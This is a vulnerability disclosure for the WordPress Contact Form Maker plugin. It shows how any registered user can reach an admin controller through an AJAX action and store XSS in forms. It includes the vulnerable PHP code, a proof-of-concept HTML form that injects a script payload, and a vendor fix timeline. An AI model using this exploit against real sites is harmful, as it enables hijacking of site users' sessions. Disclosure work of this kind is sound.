_form_makercfm() is accessible for every registered user (created using wp-login.php?action=register) because of _add_action('wp_ajax_get_stats_fmc', 'form_makercfm')
In this function we can include and run _/admin/controllers/FMControllerManagefmc.php class which is responsible for plugin management.
We can edit any plugin form and add XSS to it using wp-admin/admin-ajax.php, because output is not escaped properly.
File: contact-form-maker\contact-form-maker.php
function form_maker_cfm() {
require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
$page = WDW_FMC_Library::get('page');
if (($page != '') && (($page == 'manage_fmc') || ($page == 'submissions_fmc') || ($page == 'blocked_ips_fmc') || ($page == 'themes_fmc') || ($page == 'licensing_fmc') || ($page == 'featured_plugins_fmc') || ($page == 'uninstall_fmc') || ($page == 'formcontactwindow'))) {
require_once (WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst(strtolower($page)) . '.php');
$controller_class = 'FMController' . ucfirst(strtolower($page));
$controller = new $controller_class();
$controller->execute();
}
}Proof of Concept
Login as standard user.
This data allows edit form ID=1 and add simple XSS to it:
<form method="post" action="http://wordpress-instalation/wp-admin/admin-ajax.php?action=get_stats_fmc&page=manage_fmc&task=save¤t_id=1">
<input type="text" name="form_front" value="<script>alert("XSS");</script>">
<input type="submit" value="Hack!">
</form>Timeline
- 14-10-2014: Discovered
- 07-11-2014: Vendor notified
- 08-11-2014: Version 1.7.19 released, issue resolved
